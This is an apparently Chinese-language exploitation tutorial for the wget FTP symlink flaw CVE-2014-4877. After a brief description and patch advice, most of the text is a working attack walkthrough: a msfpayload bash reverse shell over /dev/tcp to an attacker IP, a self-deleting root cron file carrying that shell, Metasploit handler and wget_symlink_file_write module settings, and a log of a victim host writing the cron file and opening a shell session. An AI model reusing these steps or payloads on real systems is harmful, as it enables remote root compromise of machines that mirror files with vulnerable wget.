Wget FTP Attack Vulnerability

Wget-FTP-Attack-Vulnerability

Intro

The flaw is triggered when wget receives a directory listing that includes a symlink followed by a directory with the same name.

修复

Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch. If you use a distribution that does not ship a patched version of wget, you can mitigate the issue by adding the line “retr-symlinks=on” to either /etc/wgetrc or ~/.wgetrc.

利用教程

建立一个计划任务文件脚本

msfpayload

msfpayload cmd/unix/reverse_bash LHOST=172.16.68.132 LPORT=4444 R

0<&66-;exec 66<>/dev/tcp/172.16.68.132/4444;sh <&66 >&66 2>&66r

cronshell

cat cronshell

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&63-;exec 63<>/dev/tcp/172.16.68.132/4444;sh <&63 >&63 2>&63'; rm -f /etc/cron.d/cronshell

配置本地监听

locallisten

msf > use exploit/multi/handler                                                
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash                    
PAYLOAD => cmd/unix/reverse_bash                                               
msf exploit(handler) > set LHOST 172.16.68.132                                 
LHOST => 172.16.68.132                                                         
msf exploit(handler) > set LPORT 4444                                          
LPORT => 4444                                                                  
msf exploit(handler) > run -j                                                  
[*] Exploit running as background job.                                         

[*] Started reverse handler on 172.16.68.132:4444                              

[*] Starting the payload handler...                                            
msf exploit(handler) >  

搭建一个匿名攻击ftp

ftp

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write                                                               
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
TARGET_FILE => /etc/cron.d/cronshell                                        
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell     
TARGET_DATA => file:cronshell                                               
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21                     
SRVPORT => 21                                                               
msf auxiliary(wget_symlink_file_write) > run                                
[*] Auxiliary module execution completed                                    

[+] Targets should run: $ wget -m ftp://172.16.68.132:21/                   
[*] Server started.

目标利用

target target

[*] Server started.                                                         
msf auxiliary(wget_symlink_file_write) > [*] 172.16.17.119:56396 Logged in with user 'anonymous' and password 'anonymous'...
[*] 172.16.17.119:56396 -> LIST -a                                          
[*] 172.16.17.119:56396 -> CWD /4BDZLdr5AdsK                                
[*] 172.16.17.119:56396 -> LIST -a                                          
[*] 172.16.17.119:56396 -> RETR cronshell                                   
[+] 172.16.17.119:56396 Hopefully wrote 183 bytes to /etc/cron.d/cronshell  
[*] Command shell session 1 opened (172.16.68.132:4444 -> 172.16.17.119:54412) at 2014-10-31 04:13:01 -0400
sessions                                                                    

Active sessions                                                             
===============                                                             

Id  Type        Information  Connection                                     
--  ----        -----------  ----------                                     
1   shell unix               172.16.68.132:4444 -> 172.16.17.119:54412 (172.16.17.119)

msf auxiliary(wget_symlink_file_write) > sessions -i 1                      
[*] Starting interaction with 1...                                          

ip a                                                                        
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                   
    inet 127.0.0.1/8 scope host lo                                          
    valid_lft forever preferred_lft forever                                 
    inet6 ::1/128 scope host                                                
    valid_lft forever preferred_lft forever                                 
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:21:5b:1c brd ff:ff:ff:ff:ff:ff                      
    inet 172.16.17.119/24 brd 172.16.17.255 scope global eth0               
    valid_lft forever preferred_lft forever         

利用条件

目标机开启crontab 和利用wget递归下载

引用

url1

url2

url3